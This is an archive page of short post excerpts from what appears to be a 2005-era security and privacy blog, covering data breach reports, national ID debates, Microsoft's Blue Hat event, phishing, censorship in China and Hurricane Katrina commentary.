The roundtable I did as part of the Security 360 (with Amy Roberts, Peter Cullen, and Gerry Gebel) is now archived at “Microsoft Executive Circle Webcast: Security360 with Mike Nash: Managing Privacy in Your Organization.” Since I’ve been posting a lot recently, I’ll repeat: after filming I participated in Microsoft’s Blue Hat, you can read […]

 

UK ID Cards a Doubly Bad Idea

Microsoft UK National Technology Officer Jerry Fishenden warns that the push for a national ID card in Great Britain could lead to identity fraud on a gigantic scale unlike anything that has been seen before. The Register reports… and Charles Clarke confirms that ID cards will be a massive waste of both time and money […]

 

Security Costs of Logging

In “Online Dirty Tricks at American Airlines ” Gary Leff reports: The Wikipedia entry on the Wright Amendment (the law which restricts destinations of flights taking off from Dallas’ Love Field, which serves — and was intended — to protect American Airlines from Southwest) was edited by someone using an American Airlines domain. Someone using […]

 

Thanks, Adam

I’ll confess to some stage fright, since this blog’s readership is probably two or three orders of magnitude larger than what my fortnightly rants over at my place probably garner. Anyway, I hope to have posts forthcoming about a few things, among them CVSS, and research into estimating the impact of security events (variously defined) […]

 

Introducing Chris Walsh

One of the things that happens as a blog takes on a personality is that readers start to send you links to things that are “more your blog than theirs.” Over the last few months, Chris has fed me something between a third and a half of the breaches listed in my breaches archive. At […]

 

Now Headlining: The Emergent Chaos Jazz Combo

As I experiment with bringing in guest bloggers, the old subtitle of the blog, ‘Musings from Adam Shostack on security, privacy, and economics’ is now inaccurate. Now I could simply declare this “Adam Shostack and friends,” but that is both boring and, with no offense to my invitees, inaccurate. (I’ve never met the fellow who […]

 

Watch our webcast!

Last week, I was in Redmond for a few days, filming a roundtable discussion with Amy Roberts of Microsoft, Gerry Gebel of the Burton Group and Peter Cullen, Microsoft’s Chief Privacy Strategist. I think we had a great discussion, the time went by really quickly. I hope that the good energy we had in the […]

 

First Shmoocon Speaker List

Shmoocon was a great get-together last year, and I look forward to being there this year, especially now that they’ve announced a first batch of speakers. Via the Shmoocon RSS feed. No, just kidding, they don’t have an RSS feed.

 

Blue Hat Report

The other thing I did at Microsoft last week was I participated in Blue Hat. Microsoft invites a selection of interesting researchers to come to Redmond and present a talk to a variety of people within the company. Blue Hat is organized by Kymberlee Price, who works with Andrew Cushman, and they did a great […]

 

Security 360 With Mike Nash (and Adam)

Last week, I was in Redmond for a few days, filming a roundtable discussion with Amy Roberts of Microsoft, Gerry Gebel of the Burton Group and Peter Cullen, Microsoft’s Chief Privacy Strategist. I think we had a great discussion, the time went by really quickly. I hope that the good energy we had in the […]

 

AOL and DHS: Where's the Proof?

Several folks have sent me a link to a Free Market News article “HOMELAND SEC. SURVEIL ALL AOL FILES,” with a suggestion I link to it. I thought it was squirrelly, but when the normally quality Chief Security Officer Magazine picks it up, I felt a need to respond. And frankly, I call bull. by […]

 

Small Travel Annoyances

I’ve slept in three different hotels in the last ten days or so, and noticed a number of things that (seemingly) could be done a lot better. The first is voice mail spam. I get no warm fuzzy from picking up a pre-recorded voice mail welcoming me to the hotel. But I do get to […]

 

Dangerous Meme

If you have to educate people to not use the tools you have given them in a certain way to remain secure you have failed. Relying on security awareness training is an admission of failure. This meme must be eradicated from the gene pool. So writes Rich Stiennon in “Dangerous meme.” He’s absolutely right. Training […]

 

Who's On Drugs?

Over at the History News Network, Keith Halderman reports on medical marijuana. It seems that the cool kids don’t want to be taking any drug that old geezers use: “Nine years after the passage of the nation’s first state medical marijuana law, California’s Prop. 215, a considerable body of data shows that no state with […]

 

Daniel Cuthbert's Chewbacca Defense

We take a break from our regularly scheduled, deeply-movie-focused, Friday Star Wars security blogging to mention the Chewbacca defense, and its interplay with a story that’s floating around. First, if you’re not familiar with it, “The ‘Chewbacca Defense‘ is a satirical term for any legal strategy that seeks to overwhelm its audience with nonsensical arguments […]

 

Blue Hat

I’m at Microsoft’s ‘Blue Hat’ event, and it’s been fascinating. Very senior folks got briefed today while I sat in the back of the room and (mostly) listened. I’ll blog some thoughts shortly, but I expect to continue to be mostly unresponsive through Sunday.

 

Codecon 2006 Call For Papers

February 10-12, 2006, San Francisco CA, USA

codecon is the premier showcase of cutting edge software development. It is an excellent opportunity for programmers to demonstrate their work and keep abreast of what’s going on in their community. All presentations must include working demonstrations, ideally accompanied by source code. Presentations must be done by one […]

 

A Profusion of Taxonomies

In “In the Classification Kingdom, Only the Fittest Survive,” Carol Kaesuk Yoon writes about the profusion of naming schemes for animals: Then there’s uBio, which has sidestepped the question of codes and regulations altogether and instead aims to record every single name ever used for any organism, scientific or common, correct or incorrect, down to […]

 

Editorial Parameters?

One of the things that I’ve meant to do here is have a little chaos now and then, and see what emerges. One type of chaos that I’ve been aiming for is carefully selected guest bloggers. In talking to someone about that, he asked: What are the editorial parameters? Looking to avoid a possible “I […]

 

Businesses For Privacy

Some prominent business organizations are complaining to Congress that the Patriot Act makes it too easy for the government to get confidential business records. These groups endorsed proposed amendments that would require investigators to say how the information they seek is linked to individual suspected terrorists or spies. The changes also would allow businesses to […]

 

Airport Screening Is Not A Game?

A few weeks ago, I reported on PlayMobil’s airport screening playset in “From The Mouths of Toymakers.” Dan Solove shows his true commitment by buying one, and documenting his hours of fun in “The Airline Screening Playset: Hours of Fun!” Read it.

 

The Future of Government: Exclusive and Effective?

In Balkinization, Stephen Griffin writes about the efforts to get government and society functional again in New Orleans in “The Katrina Experiment.” In a pair of posts that are, to me, closely related, Michael Froomkin writes about “My notes from the ‘The Great Debate’ at State of Play III” and “Summing Up ‘The Great Debate’ […]

 

The Nation-State: Violent and Exclusive

I usually call my collections of links ‘small bits,’ rather than roundups, because I make no effort to round up all of what’s interesting about a subject. But today’s subject, especially the first items, I cannot call small. I start with the most horrific, Rebecca MacKinnon’s “Chinese activist bludgeoned to death in front of […]

 

Bank of America, some credit card numbers, laptop

In a letters sent to Buxx [prepaid debit cards] users and dated Sept. 23, [Bank of America] warned that customers may have had their bank account numbers, routing transit numbers, names and credit card numbers compromised by the theft. Visa Buxx is a prepaid credit card for teenagers that the Bank of America (BofA) stopped […]

 

Mount Sinai Hospital, 10,000 Ground Zero worker SSNs, Disgruntled Ex-Employee

Letters have gone out to about 10,000 Ground Zero rescue and cleanup workers, notifying them that a computer containing Social Security numbers and health records was stolen, leaving them vulnerable to identity theft. The letters were sent by the World Trade Center Medical Monitoring Program, which is providing free health-care services to the workers. Workers […]

 

Thomas Schelling, Nobel Laureate

Congratulations to Thomas Schelling, who was awarded the Nobel Prize in economics (with Robert Aumann). Schelling, amongst many accomplishments which Tyler Cowen discusses here, put forth the notion that there are questions with answers which are correct because those are the answers everyone would choose. (The canonical example is where do you meet in New […]

 

Security Roundup: Build Security In Edition

David Litchfield lets rip at Oracle in “Complete failure of Oracle security response.” Such questions need to be directed to more vendors than just Oracle. Andrew Jaquith writes about “Hamster Wheels of Pain” in security company presentations. The Seattle Times has an article on those new fancy, radio controlled cockpit doors, “Glitch forces fix to […]

 

FedEx and Resiliency

There are some fascinating tidbits about how Federal Express plans for the unforeseen in a New York Times story, “Have Recessions Absolutely, Positively Become Less Painful?” I wonder what (if anything) information security could take away from this sort of approach? It had been a busy day for Georgia businesses, and FedEx’s regular nightly flights from […]

 

Kill The Smurfs

The people of Belgium have been left reeling by the first adult-only episode of the Smurfs, in which the blue-skinned cartoon characters’ village is annihilated by warplanes. The short but chilling film is the work of Unicef, the United Nations Children’s Fund, and is to be broadcast on national television next week as a campaign […]

 

"A Reader Writes…"

Rob Sama IM’d me a link to some Mac launch rumors at “http://www.macpro.se/?p=3014.” He then commented: Rob: I was the one who pointed that out to Cringley, and Calzone had pointed it out to me Adam: and you got no cred? Rob: I guess. I mean, columnists like that often say “a reader told me…” […]

 

Archimedes' Death Ray?

Boingboing directs us to “Archimedes Death Ray: Idea Feasibility Testing,” in which an MIT class decides to test Archimedes’ ray: The use of mirrors to set warships on fire. Mythbusters claimed it was a myth, that the idea couldn’t be made to work. Well, the MIT class gave it a shot, and it turns out […]

 

"Where is that Shuttle Going?"

VADER: Where is that shuttle going? PIETT (into comlink): Shuttle Tydirium, what is your cargo and destination? PILOT VOICE (HAN)(filtered): Parts and technical crew for the forest moon. VADER: Do they have a code clearance? PIETT: It’s an older code, sir, but it checks out. I was about to clear them. In modern cryptography, a […]

 

The Memory Hole

As an aside in a longer article, Dan Markel writes: As a matter of blogging ethics, I think the way to handle it is to post an apology and clarification and to remove the inaccurate material, with a followup email that clarified the situation. This is dangerously wrong. The inaccurate material needs to stay, because […]

 

Concurring Opinions Has a Privacy Policy

Daniel Solove and company have launched a new blog, “Concurring Opinions.” Today, they posted their privacy policy. I think they’ll be sued shortly by Experian, for copyright infringement.

 

IT Harvest IT Security Summit

I should also mention that I had a good time at the Detroit IT Security Summit. I thought there was an interesting and broad selection of panelists, including some technical people and some senior managers. I didn’t get to talk to as many folks as I might have liked, but that’s always the case.

 

Today, I Publicly Praised Microsoft

On the “Meet the Bloggers” panel at the Detroit IT Security Summit, I publicly heaped praise on Microsoft for their investment in security, the results of which include some really cool tools in Visual Studio 2005. Also on the panel, Ed Vielmetti brought up a really good point that I hadn’t heard recently, that of […]

 

Bankers 1, Privacy 0

A federal judge on Tuesday struck down a California law that restricts banks from selling consumers’ private information to their affiliates, ruling that the state law is pre-empted by federal rules. The American Bankers Association, the Financial Services Roundtable and Consumer Bankers Association had sued California Attorney General Bill Lockyer, arguing that the federal Fair […]

 

The Big Privacy Picture

“Smart Borders: A wholesale information sharing and surveillance regime” is Krista Boa’s overview of the amorphous and opaque ‘Smart Border’ program: Smart Borders encompasses a range of individual and cooperative initiatives, including US-VISIT, biometric passports in both nations, automated passenger risk assessment, and no fly lists among many others, all of which put privacy rights […]

 

Thoughts on RSS Feeds

I spent a lot of energy to make Emergent Chaos look nice. And how do you all repay me? You read the RSS feeds. Most of my readership (85% or so) are reading via RSS. Which is nice. It says that there’s a core of folks who are interested in what I have to say, […]

 

Who Has Fingers That Short?

PaybyTouch has arrived, and that finger in their logo looks awfully short to me. Maybe subconsciously, they know the truth? See my “Fingerprint Privacy” or “A Picture is Worth A Thousand Words” for some actual analysis, rather than silly sniping. (via Silicon Beat, who has notes on their unusual financing techniques.)

 

Congrats to Brent Simmons

NewsGator Technologies has acquired NetNewsWire, along with Ranchero Software founder Brent Simmons. Simmons joins NewsGator as product architect. I discovered this via Brent’s NetNewsWire, and am blogging it with his MarsEdit. See the interview with Brent and Greg Reinacker. For consistency’s sake, I ought to be confusing Newsgator with someone else.

 

Who Obeys the Laws of War?

There’s a fascinating article on Dozame.org, a Kurdish site: “Emergence of a better Kurdish 4GW frightens Turkey:” An interesting observation is that HPG is now playing by all the rules set up by international conventions, treaties and war-laws [Jus in Bello] (which ARGK unfortunately occasionally broke). People in the military or with a military background […]

 

Privacy Enhancing Technologies Workshop call for papers

The 6th Workshop on Privacy Enhancing Technologies will be held at Robinson College, Cambridge, United Kingdom, June 28 – June 30, 2006. Paper submissions are due March 3, 2006. See http://petworkshop.org/2006/ for more details. [Also note that this will be co-located with the workshop on economics and information security. Thanks to Allan Friedman for reminding me.]

 

Web 2.0: What Will Emerge From Chaos?

Over at Infectious Greed, Paul Kedrosky responds to a reader about the “Web 2.0” meme: As much as I love trying the new technology and services, very little has changed in how I use the web. Only RSS aggregation has truly offered me value. Everything else I enjoy trying out and then utterly forget it […]

 

Disaster Planning

Since Katrina, I’ve been trying to spend about $25 a week on disaster preparedness. Fortunately, I already own some basic camping gear, so I’m starting out by storing more food and water. My pantry tends to be thin on food that can be eaten without preparations. I have powerbars and snack bars so I’ve been […]

 

Shmoocon 2006

Today is the last day to get the stunningly low $75 rate for Shmoocon in Washington DC Jan 13-15, 2006. Remember to bow to Bruce’s firewall (largish video download). I understand this year’s con will culminate in a deathmatch between a new, armed Shmoo robot and the speaker who gets the worst ratings. The speaker […]

 

National Poison A Database Day?

The fine folks at BugMeNot (free registration required) are sponsoring “Internet Advertiser Wakeup Day.” I think it’s a cool, but flawed, idea. If you believe that paying for service is better than kneeling before the advertisers and giving up your privacy, then poisoning the databases is good. However, to be effective, the poisoning needs to […]

 

Harper's Privacy Framework for DHS

Jim Harper writes: At this week’s meeting of the Department of Homeland Security’s Data Privacy and Integrity Advisory Committee, Joanne McNabb, Chief of the California Office of Privacy Protection, and I circulated and presented a draft ‘Framework’ for assessing homeland security programs in terms of their consequences for privacy and related values. Members of the […]

 

Fishermen's Friend, Breathalyzers

It comes after a 24-year-old driver was found to be over the legal drink-drive limit during a routine control in Munich. He was taken to the police station where blood tests found he had no alcohol in his system. The man was released after officers found the strongest thing he had taken was a Fisherman’s […]

 

"Remains Safely Anonymous"

People seem to dig Star Wars posts. I could probably blog for a month on security lessons, illustrated with Star Wars quotes, but I’d need to buy the DVDs and get some video capture technology, and … …ok. You’ve convinced me. Friday Star-Wars-security-lessons-blogging it is. Ben: The “other” he spoke of is your twin sister. […]

 

Bugger Productivity

It’s not like I was getting any work done anyway. (Ok, actually I was: Five of yesterday’s six posts took under 10 minutes, and four took 5 minutes or less.) But: Scientists invade the privacy of Giant squid, intruding on their long-preserved solitude. Also be sure to notice National Geographic’s beautiful user interface for selecting […]

 

University of Georgia, 2400 SSNs, Hacker

ATHENS – A hacker broke into a computer database at the University of Georgia, gaining access to the Social Security numbers of employees in the College of Agricultural and Environmental Sciences and people who are paid from that department. More than 2,400 numbers, belonging to roughly 1,600 people, may have been exposed, UGA spokesman Tom […]

 

FinCEN Effectiveness

At the Counter-Terror blog, Andrew Cochran writes: “Treasury Department’s FinCEN Unit Recovering From “Cyberjacked” E-Mail System:” The most important impact of the cyberjacking has been to shut down the automated system whereby FinCEN and law enforcement request and receive information from financial institutions for use in terrorism and money laundering cases. The system, enacted under […]

 

What About My Needs?

While everyone (FCC, FBI, RIAA) is lining up to decide what software you can run, I’d just like to ask that I be included in the list. The Federal Communications Commission thinks you have the right to use software on your computer only if the FBI approves. No, really. In an obscure “policy” document released […]

 

RBC Dain Rauscher, 300,000 SSNs, Disgruntled former employee

The FBI has opened an investigation into the possible theft of personal information about some clients of RBC Dain Rauscher Inc. The chief executive of the Minneapolis-based brokerage firm disclosed the problem in a letter sent to 300,000 households. Dain Rauscher has not yet detected any fraudulent activity in their accounts, according to the letter […]

 

CUNY, Hundreds of SSNs, Exposed Files

The CUNY foul-up that put students’ personal information a Google search away from identity thieves was more widespread than first reported, with school officials saying yesterday that the Social Security numbers of hundreds of employees also got on the Web. City University of New York officials detected the unprotected payroll link for Hunter College Campus […]

 

New Ten Dollar Bills

The US has unveiled new ten dollar bills, and, unsurprisingly, they contain the EURion constellation in an entertaining spot: That’s right. Big Alexander Hamilton is watching you. Close up from Money Factory.com.

 

More On Cardsystems Lawsuit

Joris Evers continues to report well on the Cardsystems lawsuit, this time in “Judge looks for links in credit card case:” Kramer said he wants to be clear on which defendants fall under California civil code section 1798.82, the notification statute. While it is clear that the breach was at CardSystems, the law applies to […]

 

Google VPN, Macs, and Privacy

NudeCybot (hey, you’re blogging again!) asked me for opinions on Google Secure Access (or just GSA), and sent me a link to Kevin Stock’s Google Secure Access on Mac OS X. There’s a lot of critiques of Google’s Privacy policy around GSA: “Hide what you’re doing from everyone but us! And, umm, anyone who asks […]

 

North Fork Bank, 9000 mortgageholders (Not SSNs), stolen laptop

Data relating to about 9,000 mortgages that were originated by Countrywide Home Loans but sold to North Fork were in the laptop, according to a letter received by a customer on Thursday. The laptop was one of several stolen over the July 24 weekend, the letter said without identifying the office. The data included the […]

 

What Is Phishing

In conversation with a friend, I realized that my essay, “Preserving the Internet Channel Against Phishers” didn’t actually explain the problem. I made the assumption that everyone had the same perception of what it was. (Why didn’t anyone point that out?) So I’ve added the following (after the break), and I think the resultant essay […]

 

A Life, Observed

A blogger who I’d recently discovered has retired: I’ve always had my two lives separated – my offline world and my online one. That’s the way I wanted it and that’s the way I set it up and I’ve got my own reasons for it. And someone decided to ruin all the fun and be […]

 

Sweet Land of Databases

In “Stuck on the No-Fly List,” Ryan Singel discusses the procedure for, no not getting off the list [1], but for getting onto yet another “cleared” list.[2] Confused? I was too. The head of the Terrorist Screening Center [3] told me recently that I’d mixed up “No-Fly” and “Selectee.” As Daniel Solove explains in “Secure […]

 

Cardsystems Breach and Notice

On Friday, San Francisco judge Richard Kramer ruled against the idea that Cardsystems (or Visa or Mastercard) had to provide 1386 notice to people. Some articles are “Visa, MasterCard Win Battle Over Breach” and “Credit card companies can keep data ID theft secret.” But the article worth reading is CNet’s “Judge holds off disclosure in […]

 

Never Enough

After the 7/7 London bombings, France decided it was not enough. So, even though France already has one of the toughest anti-terrorism judicial arsenals in Europe, it is adding to it. Indeed, French newspaper Le Monde just revealed the clauses of the new anti-terrorist law due to be formally presented to the government on October […]

 

Judging Wines By Their Labels

Stefan Geens has an entertaining post about “how to judge a wine by its label:” Therein lies the secret as to why you really can judge wine by its label: Companies where the management has an atrocious taste in labels tend to be the old-school type, uncertain about innovation, parochial about marketing and under the […]

 

More Toys: Suicide Bomber Barbie

Yes, it’s suicide bomber Barbie! Click the picture for a few more views. Toy supplier Shuki Toys, responsible for the distribution of the stickers, said in response, “We were very surprised to see the stickers in the shop, the several sheets of stickers have been pulled off the shelves.” “We check all the stickers, thousands […]

 

Apple Security Update 2005-08

There’s a new security update from Apple, for both 10.3.9 and 10.4.2. If you browse the internet, or read email, you need it. I’m getting really annoyed at Apple’s update mechanisms. Not only the agreeing to a new license as part of the update, but the awful way in which they’re arranged. The technical data […]

 

Chinese Censorship

Rebecca MacKinnon has the story on how AOL is refusing to collaborate on blocking freedom in China, in “Internet Censorship & Corporate Choices.” Companies do have a choice, and the choices they make matter a great deal. Security technologies that help protect people from their governments are not yet internationalized and easy to use. So […]

 

Real ID, Real Unfunded Mandate, Real Unnecessary

It seems to be standard that major new government programs cost more than we expect. Federal Computer Week has a story, “Real ID costs rising:” Earlier this year, Congressional Budget Office officials said nationwide implementation of the Real ID Act would cost $100 million in five years. The act requires minimum national standards and physical […]

 

Security Implications of Economics of ID Cards

Some of the precepts that proponents of national ID often put forth are that it can make “illegal immigration more unpleasant for immigrants,” or that “a national ID system has some substantial potential to be the cornerstone of a national fraud-prevention system.” These are attractive notions, but will not be borne out in reality. Actually, the […]

 

"Every Valid Vote?"

Kip Esquire continues his coverage in “ACLU Sues to Block Georgia Voter ID Law,” and closes, like he did in a comment on my last post on the subject: Always remember, it’s not about “making every vote count,” but rather “making every valid vote count.” I don’t think this works as a requirements statement. First, it […]

 

Small Bits on Security

“Security cameras certainly aren’t useless. I just don’t think they’re worth it.” So comments Bruce Schneier on the news that “Cameras Catch Dry Run of 7/7 London Terrorists.” Richard Bejtlich comments on “Citadel Offers Product Security Warranty.” I think Richard nails it with his analysis that “There are probably enough loopholes through which one could […]

 

Thoughts on Chapell's View

Alan Chapell has some interesting thoughts in “CONSUMER WATCH: Localities put private data in harm’s way:” As an aside, some might argue that there’s little distinction between “evil doer” and “data broker”. I prefer to view the latter as the poster children for another unregulated industry that is screaming for the Government to step in. […]

 

2005 MacArthur Fellows Announced

I always find it fascinating to see who the foundation chooses to honor and support. The list of 2005 Winners is worth reading. Hey! No, really! Even if this is a short post, go click the link. Hmm, I should add a picture or something.

 

Palo Alto Children's Health Council, 6,700 SSNs, Thief

A backup tape containing the names, Social Security numbers and detailed health information of as many as 6,000 current and former clients of the Children’s Health Council was stolen from the nonprofit agency’s offices, officials confirmed Sunday. From SignonSandiego, “Thousands of health records stolen from Palo Alto agency.” via Cotse Privacy Watch. The Children’s Health […]

 

Investigating New Orleans Failures

In “Bush Aide Will Lead Hurricane Inquiry,” the New York Times chronicles the sort of petty bickering we’ve come to expect from kindergarteners America’s leadership. Today’s subject-of-bickering is who is to investigate the failures in New Orleans: On Capitol Hill, Congressional Republicans continued their efforts Monday to persuade Democrats to take part in a special […]

 

Yahoo & China

Yahoo! co-founder Jerry Yang said the company was merely following Chinese law – it had no choice. But as human rights groups have been pointing out, Yahoo! has been going above and beyond the strict legal requirements for some time. In 2002 it signed the Internet Society of China’s Public Pledge on Self-Discipline for the […]

 

Voter ID Cards

Kip Esquire, who I enjoy reading, writes: The voter ID proposal, already causing a stir in Georgia, is a reasonable compromise. ID cards help deter voter fraud, yet if the cards are free, then the “poll tax” histrionics evaporate (see, e.g., my previous post). I agree that some histrionics may go away, but the real […]

 

Parental Privacy

My first reaction was shock, then anger. Why did the baby formula company have her due date? I had shared our baby’s due date with only two businesses: my health insurance company and a Web site for expectant and new parents. When I registered to enter the Web site, I specifically requested that it not […]

 

Command-Q Getting Me Down

The Mac’s Terminal.app is way too easy to quit; it seems to absorb any command-Q typed near it, even if the menubar is showing you that you’re in another app. (This may be an interaction with the preference FocusFollowsMouse.) Anyway, having just lost a bunch of terminals with useful data in them, I went and […]

 

Miami University of Ohio, 21,762 SSNs, Staff

Miami University is notifying all students who attended Miami during the fall 2002 semester that a report containing their names, Social Security numbers and grades had been inadvertently placed in a file accessible through the Internet. University officials said that at this point they have no evidence of illegal use of the information, which included […]

 

"Iran's Nuclear Ambitions" Pitch

Earlier, I mentioned the Powerpoint deck being used to pitch the idea of Iran’s Nuclear ambitions. Now, courtesy of Edward Tufte’s forums, we have links to the presentation (PDF). This is mentioned in “U.S. Deploys Slide Show to Press Case Against Iran” in the Washington Post. The presentation is a nearly classic example of […]

 

Small Bits on Usability

Thomas Barnett comments that “The U.S. is pushing a secret PowerPoint briefing to allies on Iran, trying to convince them that the WMD question is drawing to a head there.” Maybe they’ve read “The Cognitive Style of Powerpoint,” and would prefer data to being pitched? I’ll (ahem) pitch my lesser-known Hamlet in Powerpoint. Jacob Nielsen […]

 

Security Bloggers Spit-Polish DHS

Or maybe just spit on them, and then rub it in. Not Bad For a Cubicle has “Don’t Plan on It” (http://thurston.halfcat.org/blog/?p=243): From what I can tell, the best way to keep a building from catching fire would be put these clowns in charge of burning it down. They truly are The Gang That Couldn’t Shoot […]

 

Musings After the Dali Museum

I took a little time away from the conference to visit the Salvador Dali Museum in St. Petersburg, Fl. It’s an impressive museum, and worth seeing. One of the strongest impressions I got from the experience was that of Dali’s sheer technical skill. From paintings that he made as a child (as young as 9), […]

 

Roberts on the Right to Privacy

The term “right to privacy” has, in the debate over the Supreme Court, become a code-word for a woman’s right to abortion (or more specifically, to a liberty to choose without government interference.) As someone who believes that privacy is broader than that, I was very pleased to see that Roberts said: “Senator, I do. […]

 

More on Preserving the Internet Channel Against Phishers

A new survey is reported in “Privacy and Security Concerns Flatten Interest in Online Banking” (Government Technology): After years of dramatic growth in online banking penetration, the percentage of Americans who conduct personal banking activities online remained unchanged during the 12-month period ending August 2005. According to results from a new survey of 1,000 American […]

 

Soldier Readiness Processing Center, "1000s" of SSNs, Thieves

COLORADO SPRINGS – Fort Carson has cautioned thousands of its soldiers to watch their credit records carefully following the theft of computerized personnel records from the post. Thieves broke into the Soldier Readiness Processing center over the weekend of Aug. 20-21 and stole four computer hard drives containing thousands of personnel records, Fort Carson spokeswoman […]

 

Skype, EBay, and Communications Privacy

EBay has bought Skype, for reasons that I don’t quite understand. Perhaps all that cash was burning holes in their pockets. The BBC reports: “Communications is at the heart of e-commerce and community,” said eBay chief executive Meg Whitman. “By combining the two leading e-commerce franchises, eBay and PayPal, with the leader in internet voice […]

 

"Protecting Society By Protecting Information"

Today, I’m at the National Institute of Justice’s National Conference on Science, Technology, and the Law, and am participating in a panel on “Balancing Information Sharing and Privacy.” I’ll present “Protecting Society By Protecting Information: Reducing Crime by Better Information Sharing” (Or get the powerpoint slides. I don’t know why Powerpoint makes all the speaker […]

 

Director, Malicious Code and Malware

My friend and former boss at Radialpoint is looking for a malicious code and malware expert: The Director of Malicious Code and Malware will be responsible for being the leading authority on the security and protection of more than 14 million broadband subscribers, the largest community of broadband subscribers in the world. This high profile, […]

 

On RSS Security

I’ve been mystified for a while by people talking about a need for RSS security products, as if those were somewhat different than other HTTP security products. Apparently, I wasn’t alone in this; Greg Reinacker, CTO of Feedburner Newsgator, writes: I was on a call the other day with some folks in the industry, and […]

 

Some Good News From New Orleans

John Quarterman tells of airlines sending planes to New Orleans without contracts or guarantee of payment. And the New Orleans Times Picayune tells stories of those who stayed to man the pumps in “Pace of drainage is rare bright spot.” Incidentally, while I hate ads, the work done by the staff of the Times Picayune […]

 

"Taking Stock of the Forever War"

The New York Times Magazine has a long (14 screen) article, “Taking Stock of the Forever War,” reflecting on the four years since the attacks on New York and Washington. It seems fairly even-handed overall: any article that long will have points people contest. I’m in full agreement with the general thesis, that the United […]

 

Special Administrative Improvement District?

An article in the BBC, “Uniform row rocks HK Disneyland” has great quotes from Chinese officials: Financial Secretary Henry Tang said: “We welcome Disney to come to Hong Kong to invest in Disneyland, but in the process of building Disneyland, no-one has special rights. Everyone is equal before the law.” An editorial in the Ming […]

 

A Cry for Help

…I have determined that this incident is of such severity and magnitude that effective response is beyond the capabilities of [Louisiana] and affected local governments, and that supplementary Federal assistance is necessary to save lives, protect property, public health, and safety, or to lessen or avert the threat of a disaster. I am specifically requesting […]

 

Can You Hear Me Now?

Ed Felten reports on a new technique to go from a recording of typing to the sequence of keystrokes: Li Zhuang, Feng Zhou, and Doug Tygar have an interesting new paper showing that if you have an audio recording of somebody typing on an ordinary computer keyboard for fifteen minutes or so, you can […]

 

Small Bits: Clearance, Security Legislation, Schneier Pointers, Get Me An Operator

Richard Bejtlich comments on a Federal Computer Week article, “Security clearance delays still a problem” in “Feds Hurry, Slow Down.” “ITAA officials said 27 member companies that responded to a survey are coping with the backlog by hiring cleared employees from one another, sometimes paying premiums of up to 25 percent.” I’m glad to see […]

 

Tor GUI Contest Update

I’m very excited to say we’ve added two more outstanding judges to the Tor GUI contest: Edward Tufte and Bruce Schneier. I’m honored and excited to be working with both. As a reminder, you have at least until October 31 for submissions, and all qualifying entrants will receive a t-shirt.

 

More on Bureaucracy

This is a follow-on to “Who Will Rid Me of This Meddlesome Bureaucracy?” and the same disclaimers apply. I’ll note that Time Magazine has an article “How Reliable Is Brown’s Resume:” The White House press release from 2001 stated that Brown worked for the city of Edmond, Okla., from 1975 to 1978 “overseeing the emergency […]

 

Capture The Flag Too Boring?

Max Dornseif complains that “Capture the Flag is getting somewhat boring.” That’s too bad, so with all due haste, here are some suggestions: Capture the Business: …is a slight variation on the Ghetto Hackers game. The Ghetto hackers were all about simulating a real business, with its need for uptime. In capture the business, teams […]

 

More on Opera

It has a lot to recommend it, but there are a number of niggling annoyances: Saved pages are poorly named. (Safari gives the page a name based on its title; Opera uses the filename, often “index.html.”) Since I save a lot of web pages, this is an issue. Cookie management doesn’t seem as good as […]

 

What's Wrong With Fingerprints?

It’s not a question you’ll hear me ask often, but when PrestoVivace sends me a link to “DOD plans to recognize more than just fingerprints:” “We’re looking for new technologies, innovators and companies that recognize that the biometrics enterprise in the Defense Department and the U.S. government in five years is going to be very […]

 

Journalist Shi Tao Jailed For 10 Years, after Yahoo! Helped

Both T-Salon and RConversation are reporting a Reporters Without Borders story, “Information supplied by Yahoo ! helped journalist Shi Tao get 10 years in prison:” The text of the verdict in the case of journalist Shi Tao – sentenced in April to 10 years in prison for “divulging state secrets abroad” – shows that Yahoo […]

 

Who Will Rid Me of This Meddlesome Bureaucracy?

One of the facets of the response to and analysis of Katrina is that the disaster is large enough that everyone can choose an aspect of it to look at from the comfortable heights of their favorite hobby-horse. Be it the incompetence of (state, federal, or local) government, the evils of (small or big) government, […]

 

Bring Back The 9/11 Commission

As historians, they did a fantastic job of gathering information. They have credibility and stature. They have the perspective to tie the destruction of New Orleans to the destruction in New York, Washington, and Pennsylvania, and to consider the failures of leadership and the failures of response in the context of massive new spending to […]

 

New Orleans Roundup

Michael Froomkin points to a claim that “Long before FEMA dropped the ball, local authorities decided they didn’t need one: See LENIN’S TOMB: Everything has gone according to plan.” For more, the City of New Orleans web site is still operational, and has a section on Emergency Preparedness. Bruce Sterling, with only a small […]

 

Katrina Roundup

Suzette Haden Elgin has an interesting essay on the “biblical proportions” construct, and its meaning. Thomas Barnett has written “The art of the long view,” which is an interesting perspective to be able to maintain right now. Another useful perspective comes from Bill West at the Counterterrorism blog in “Katrina Response – Another Quick Observation,” […]

 

New Orleans Times-Picayune Open Letter To The President.

…Every official at the Federal Emergency Management Agency should be fired, Director Michael Brown especially. In a nationally televised interview Thursday night, he said his agency hadn’t known until that day that thousands of storm victims were stranded at the Ernest N. Morial Convention Center. He gave another nationally televised interview the next morning and […]

 

Bush Fires Chertoff

(CNN reports:) President Bush told reporters on Friday that millions of tons of food and water are on the way to the people stranded in the wake of Hurricane Katrina — but he said the results of the relief effort “are not acceptable.” He then went on to fire DHS Secretary Chertoff. I’m such a […]

 

Asif Siddiqui Update

In May, I blogged “Georgia DMV, employee Asif Siddiqui, “hundreds of thousands.”” An anonymous tipster sent me a link to “Unemployment Appeal Decision:” The following is the decision of Appeals Tribunal of Georgia Department of Labor ruling that Asif Siddiqui is entitled to unemployment benefits as employer Georgia Technology Authority failed to prove their allegations. […]

 

Some Good News from New Orleans

It seems that both the French Quarter may have survived, and Fats Domino definitely has, despite earlier reports he was missing. It also seems that the National Guard is finally getting food to some people, and evacuating others, although there’s a lot more to do. Oh, and just when I try to get in a […]

 

Katrina, Looking Longer Term

There’s a very long post on the public health implications of Katrina at Dave Farber’s IP list, “Hurricane Katrina Analysis – CFR Global Health Program.” I hope that we respond better to these threats than we have to the hurricane. Thomas Barnett takes a look at the long term effects of “Katrina’s System Perturbation.” (I […]

 

New Orleans Roundup

There’s a lot of amazing things being written out there. One of the more fascinating would be Interdictor’s LiveJournal. He’s keeping a New Orleans ISP running, and blogging as he and his co-workers do. He asks that we link with mgno.com, but that’s been intermittent. Use Livejournal as a backup. Michael Froomkin has a roundup, […]

 

"This is Our Tsunami"

